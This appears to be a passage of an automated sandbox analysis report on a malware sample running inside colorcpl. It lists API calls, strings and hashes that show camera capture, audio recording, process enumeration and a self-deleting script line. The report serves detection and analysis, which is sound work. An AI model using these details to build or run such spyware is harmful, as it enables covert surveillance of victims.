                                        • FreeLibrary.KERNEL32(00000000,?,?,?,04AC07EB,00000003,?,04AC078B,00000003,04AEB4F8,0000000C,04AC08E2,00000003,00000002,00000000), ref: 04AC0890
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: b9fc1b591cae043b52c153a650fa578e610388e22495483a24f9ee1d3b608ba5
                                        • Instruction ID: b9686072c9eee5175790d6238bbe1cdfb36d13cef8d3856b4477d4c5b66f72f0
                                        • Opcode Fuzzy Hash: b9fc1b591cae043b52c153a650fa578e610388e22495483a24f9ee1d3b608ba5
                                        • Instruction Fuzzy Hash: AAF06235A01218FBDB559FA4D849BEEBFB9EF14755F0042A9F806A6150CB38AE41CB90
                                        Function 04A850C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,04AF1E90,04A84E5A,00000001,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000), ref: 04A85100
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000), ref: 04A8510C
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000), ref: 04A85117
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000), ref: 04A85120
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        Strings
                                        • Connection KeepAlive | Disabled, xrefs: 04A850D9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                        • String ID: Connection KeepAlive | Disabled
                                        • API String ID: 2993684571-3818284553
                                        • Opcode ID: 7fb04f5467eab4d48e561290959aeac7c01be6de662bdce665598ffc33d17f08
                                        • Instruction ID: a9bc2f53e344ea0cbc60e55669732f5a6ac2b586b8681aad6714d693307a8947
                                        • Opcode Fuzzy Hash: 7fb04f5467eab4d48e561290959aeac7c01be6de662bdce665598ffc33d17f08
                                        • Instruction Fuzzy Hash: DFF05472D05300BFFF117B758D09A7A7FA8EB12224F00494DFC93866A0DAA5BC51CB51
                                        Function 04A813F2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 04A813FC
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A81403
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetCursorInfo$User32.dll$`#v
                                        • API String ID: 1646373207-1032071883
                                        • Opcode ID: ed589200ff6b2c782906d6ef345b58b340d5760756296603f5f5a802b74565f0
                                        • Instruction ID: 044ba0f0a4c19edee690e87eb7eddecb3fd72e1253aa1913a1b6c2cb0cb1084f
                                        • Opcode Fuzzy Hash: ed589200ff6b2c782906d6ef345b58b340d5760756296603f5f5a802b74565f0
                                        • Instruction Fuzzy Hash: 19B092F5E83301EB8A00AFB2AA0D9163EACFA286027000184B09389100EB782906DE20
                                        Function 04ABBB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 642d51305480152d3090839282ae43c92bd47f9d4820fcf1565df9f907f09fe9
                                        • Instruction ID: 38fc3c463a6653b6ccb9889364f9ebcaaa1f3f837f2a205b763aa7f4e9314164
                                        • Opcode Fuzzy Hash: 642d51305480152d3090839282ae43c92bd47f9d4820fcf1565df9f907f09fe9
                                        • Instruction Fuzzy Hash: F171AF31A002569BDB22CF55C884AFEBB7DEF45310F144629E8A167582DB74B941CBF0
                                        Function 04A84351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000000,04A8BE20), ref: 04A844A4
                                          • Part of subcall function 04A845E7: __EH_prolog.LIBCMT ref: 04A845EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: H_prologSleep
                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                        • API String ID: 3469354165-3547787478
                                        • Opcode ID: 0fd980ca5a725c654981bcef4944f934868704ad92e9946a5ada4fe01e935d0b
                                        • Instruction ID: bee6af967e01310b5cc0a60198f4482b5c419cd0715057d9d969a34405e56e8c
                                        • Opcode Fuzzy Hash: 0fd980ca5a725c654981bcef4944f934868704ad92e9946a5ada4fe01e935d0b
                                        • Instruction Fuzzy Hash: F0513972B042116BEA08FB758904A7D3BA9EF98648F40055DF9569F2C0FF34BD06C392
                                        Function 04AC220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • _free.LIBCMT ref: 04AC2318
                                        • _free.LIBCMT ref: 04AC232F
                                        • _free.LIBCMT ref: 04AC234E
                                        • _free.LIBCMT ref: 04AC2369
                                        • _free.LIBCMT ref: 04AC2380
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$AllocateHeap
                                        • String ID:
                                        • API String ID: 3033488037-0
                                        • Opcode ID: 9ef27fab3a3239fbe859e71627e7cb48239e4e8ca5343019af5b4774020ec93e
                                        • Instruction ID: ceb67ae7ff7f029a737942d38249c4cbcb99b011d5ba5025161d0937fc998aa2
                                        • Opcode Fuzzy Hash: 9ef27fab3a3239fbe859e71627e7cb48239e4e8ca5343019af5b4774020ec93e
                                        • Instruction Fuzzy Hash: DF51AF72A00704AFEB60DF69C941BAA77F4EF49724B1445ADE84ADB250EB31F9018B90
                                        Function 06912FD2 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                        • Instruction ID: 86411be2d3818f82fd64f3a15ac80f1954e5abc008c9763ceb515aa168781162
                                        • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                        • Instruction Fuzzy Hash: FE51A371A00308AFDBA1DF69DC41A6A77F8EF49720F344669E859DFA90E731D941CB80
                                        Function 04AC6894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,04ADC1E4), ref: 04AC68FE
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,04AEF754,000000FF,00000000,0000003F,00000000,?,?), ref: 04AC6976
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,04AEF7A8,000000FF,?,0000003F,00000000,?), ref: 04AC69A3
                                        • _free.LIBCMT ref: 04AC68EC
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04AC6AB8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        • Opcode ID: b1a85b42ab5f98527dd7da818eb7edf6681535f899f6ba1745218bee00871135
                                        • Instruction ID: fa1e1793b41052da57eddd0172832c10896936d1cf0c2f91fc5d9d8ad48aad01
                                        • Opcode Fuzzy Hash: b1a85b42ab5f98527dd7da818eb7edf6681535f899f6ba1745218bee00871135
                                        • Instruction Fuzzy Hash: B451F8B1900219BFDB60EFA9CD809BEB7BCEF45314B10426EE4659B280E734BE41CB50
                                        Function 04AC7757 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,04AC7ECC,04AD3EB5,00000000,00000000,00000000,00000000,00000000), ref: 04AC7799
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 04AC7855
                                        • WriteFile.KERNEL32(?,00000000,00000000,04AC7ECC,00000000,?,?,?,?,?,?,?,?,?,04AC7ECC,04AD3EB5), ref: 04AC7874
                                        • WriteFile.KERNEL32(?,04AD3EB5,00000001,04AC7ECC,00000000,?,?,?,?,?,?,?,?,?,04AC7ECC,04AD3EB5), ref: 04AC78AD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 977765425-0
                                        • Opcode ID: 60bc70a5fb52766dbc431bb1408e96c4bc11efa134fdd1d82734d50afd03d0cc
                                        • Instruction ID: a329ff3454aa6dbbe3d6dba1539bcad5129700703d65793f20f551b81b51ddd1
                                        • Opcode Fuzzy Hash: 60bc70a5fb52766dbc431bb1408e96c4bc11efa134fdd1d82734d50afd03d0cc
                                        • Instruction Fuzzy Hash: 6C51A575E0024A9FDB50CFA8D855AEEBBF9EF09300F14415EE555E7281E734A941CF60
                                        Function 04A8E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A99F23: GetCurrentProcess.KERNEL32(?,?,?,04A8C663,WinDir,00000000,00000000), ref: 04A99F34
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04A8E305
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 04A8E329
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 04A8E338
                                        • CloseHandle.KERNEL32(00000000), ref: 04A8E4EF
                                          • Part of subcall function 04A99F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,04A8DFB9,00000000,?,?,00000001), ref: 04A99F66
                                          • Part of subcall function 04A99F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 04A99F9C
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 04A8E4E0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 1735047541-0
                                        • Opcode ID: ab6834da6539abb13b446dc0a820ae20ae3c1d5ed8ffb3503109102890890bf9
                                        • Instruction ID: 6f4a487ac5cb6db554adfd0ade1303c8baa0fa940e8b4d56de265ba478b1b379
                                        • Opcode Fuzzy Hash: ab6834da6539abb13b446dc0a820ae20ae3c1d5ed8ffb3503109102890890bf9
                                        • Instruction Fuzzy Hash: 2F41EF715092409BE325FB60DA90AEFB3E9EFE4304F50492DE48A861D1EF34BD4BC652
                                        Function 04AC12F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: f7930abd4b555a31a5c4b16cb1cbf37ae91daeacf4f1122b21ba6bd8d10f7016
                                        • Instruction ID: a62bc431d6bc925d3507a24a16f5f41186ab1021d4aaf61120d196b5d0d30174
                                        • Opcode Fuzzy Hash: f7930abd4b555a31a5c4b16cb1cbf37ae91daeacf4f1122b21ba6bd8d10f7016
                                        • Instruction Fuzzy Hash: 5B41D132F002009FDB54DFB8C984A9EB7B5EF85718B1585ADE955EB342EB31B901CB80
                                        Function 069120BE Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                        • Instruction ID: d11f669e690c862b4a487bf107c99908c08537841c7b7d048edd6eccc8b3a2cc
                                        • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                        • Instruction Fuzzy Hash: A241E436E002089FDB54DF78CC84A6EB7F5EF89714F254569D625EF780E632AA41CB80
                                        Function 0690939F Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __dosmaperr$_free
                                        • String ID:
                                        • API String ID: 242264518-0
                                        • Opcode ID: 483cb59b05aae7222e8dd9b47b4a98874ada728b8e202fcd2bd4ef1ccfd8c6c3
                                        • Instruction ID: 48cb9263df48b4ea1d6bbd3a0be8fcff20b84714904f9b20686752eedea72875
                                        • Opcode Fuzzy Hash: 483cb59b05aae7222e8dd9b47b4a98874ada728b8e202fcd2bd4ef1ccfd8c6c3
                                        • Instruction Fuzzy Hash: 14319F7280121ABFEF91AFA4DC849AE3B6CEF44270F214169F834979D5DB32C910CB61
                                        Function 04ACE30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,04AB9ED1,?,00000000,?,00000001,?,?,00000001,04AB9ED1,?), ref: 04ACE359
                                        • __alloca_probe_16.LIBCMT ref: 04ACE391
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04ACE3E2
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04AB8C3F,?), ref: 04ACE3F4
                                        • __freea.LIBCMT ref: 04ACE3FD
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 313313983-0
                                        • Opcode ID: 3ff1624e2eccef58b493df76c5e454ef6e6cd7cae434beb4ddee1d810abc5c2e
                                        • Instruction ID: ddc16f39ef0bea48828ec52307f32b0972a6b947e47121ea0b52b268fcb8c99e
                                        • Opcode Fuzzy Hash: 3ff1624e2eccef58b493df76c5e454ef6e6cd7cae434beb4ddee1d810abc5c2e
                                        • Instruction Fuzzy Hash: 94318D32A0021AABDF259F69DC84DEF7BA5EF40710B04426CEC19DA290E739E951CBD0
                                        Function 04A81BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04A81BD9
                                        • waveInOpen.WINMM(04AEFAB0,000000FF,04AEFA98,Function_00001CEB,00000000,00000000,00000024), ref: 04A81C6F
                                        • waveInPrepareHeader.WINMM(04AEFA78,00000020), ref: 04A81CC3
                                        • waveInAddBuffer.WINMM(04AEFA78,00000020), ref: 04A81CD2
                                        • waveInStart.WINMM ref: 04A81CDE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                        • String ID:
                                        • API String ID: 1356121797-0
                                        • Opcode ID: 8327d5fe962b466aecbdb1bc3144b8e8652f17377040cbb9f3c9c0c746186b8b
                                        • Instruction ID: 11d52467b6336de229dc13030fb9318bad5b2d3223524b6611648f26a85d8157
                                        • Opcode Fuzzy Hash: 8327d5fe962b466aecbdb1bc3144b8e8652f17377040cbb9f3c9c0c746186b8b
                                        • Instruction Fuzzy Hash: 01212A72600640BFD714AF67F9089267BA9FBB8714780842EF126DF6A0DB7C5C03AB44
                                        Function 04ACC53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 04ACC543
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04ACC566
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 04ACC58C
                                        • _free.LIBCMT ref: 04ACC59F
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04ACC5AE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 24fedeab760b164f1575084803c5fa9e3661fa0a523594487d9fcc7fa5a041be
                                        • Instruction ID: e7e1e25053e59dcbd7e36fe6713972107cded90799c764265e2f40e443ffaa2e
                                        • Opcode Fuzzy Hash: 24fedeab760b164f1575084803c5fa9e3661fa0a523594487d9fcc7fa5a041be
                                        • Instruction Fuzzy Hash: AC018472A422197F27611BA75D8CC7F6A6DDACEEB4315016EBD09D7100EE64AD0285B0
                                        Function 04A9A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,04AE9654,00000000,00000000,04A8BFB7,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 04A9A1BA
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 04A9A1D7
                                        • CloseHandle.KERNEL32(00000000), ref: 04A9A1E3
                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04A9A1F4
                                        • CloseHandle.KERNEL32(00000000), ref: 04A9A201
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreatePointerWrite
                                        • String ID:
                                        • API String ID: 1852769593-0
                                        • Opcode ID: 60ce01e7c56926da22ef63c3068df2ac454bfda3e1f281179d4b502404392e40
                                        • Instruction ID: 4cd94604b32dcc9dc98a8353cf0ae03fbe7d8934249c4458f8b0c64a82bc9498
                                        • Opcode Fuzzy Hash: 60ce01e7c56926da22ef63c3068df2ac454bfda3e1f281179d4b502404392e40
                                        • Instruction Fuzzy Hash: 3011C07130A2547FEB144F28BC88E7B77ECEB86364F20462AF562C61C0D665AC468631
                                        Function 04A8FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04A8FBD5
                                        • int.LIBCPMT ref: 04A8FBE8
                                          • Part of subcall function 04A8CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 04A8CAFA
                                          • Part of subcall function 04A8CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 04A8CB14
                                        • std::_Facet_Register.LIBCPMT ref: 04A8FC28
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 04A8FC31
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8FC4F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID:
                                        • API String ID: 2536120697-0
                                        • Opcode ID: a5874c4925fdd87e3c51dfc0b0fddddee5a1f1bf9d956738a67151d405b7215b
                                        • Instruction ID: 128e5d4d0bef9f20025152d3160576a4f4985511e70382d90931b507436c7d51
                                        • Opcode Fuzzy Hash: a5874c4925fdd87e3c51dfc0b0fddddee5a1f1bf9d956738a67151d405b7215b
                                        • Instruction Fuzzy Hash: 7A11C672900119ABDB14FFA4DA048DEB769DF54624B10055EFD45A7250EE31FE06CBE0
                                        Function 068E098D Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 068E099A
                                        • int.LIBCPMT ref: 068E09AD
                                          • Part of subcall function 068DD8AE: std::_Lockit::_Lockit.LIBCPMT ref: 068DD8BF
                                          • Part of subcall function 068DD8AE: std::_Lockit::~_Lockit.LIBCPMT ref: 068DD8D9
                                        • std::_Facet_Register.LIBCPMT ref: 068E09ED
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 068E09F6
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 068E0A14
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID:
                                        • API String ID: 2536120697-0
                                        • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                        • Instruction ID: aec747cfc75e83b33dd7281945fe0405b2d38003692debdeaee7481c61afde06
                                        • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                        • Instruction Fuzzy Hash: A2110A72D04118ABCB90FFA8DC048EE7778DF40660F10495AE954EB290DB709E41C7D1
                                        Function 06908EBF Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 06908EDB
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 06908EF4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                        • Instruction ID: 06a9e60277da5151797634e608c5b5000c0016d641162dc6c09b35d0d2e7e43c
                                        • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                        • Instruction Fuzzy Hash: A301283671D3212EBFD43BB57C455262E8EDB45670B30033AE334498E0FF91480161C9
                                        Function 04AC57A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,00000000,00000000,04AB9A11,00000000,?,?,04AB9A95,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04AC57AE
                                        • _free.LIBCMT ref: 04AC57E3
                                        • _free.LIBCMT ref: 04AC580A
                                        • SetLastError.KERNEL32(00000000,pth_unenc,04A8E1EC), ref: 04AC5817
                                        • SetLastError.KERNEL32(00000000,pth_unenc,04A8E1EC), ref: 04AC5820
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 55122e2d23f81df8cda05c96327ccd3d5cb204916b1047da7ddda3a73c673bd5
                                        • Instruction ID: a4b1036e164ab672f08522bbdd7af618d041a6e87cb399321c731c8cd2a60fb8
                                        • Opcode Fuzzy Hash: 55122e2d23f81df8cda05c96327ccd3d5cb204916b1047da7ddda3a73c673bd5
                                        • Instruction Fuzzy Hash: 94014932E457207BA7822A356D8892B2669DBD5578721852CF82792180EF69BC425760
                                        Function 04ACDB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 04ACDBB4
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
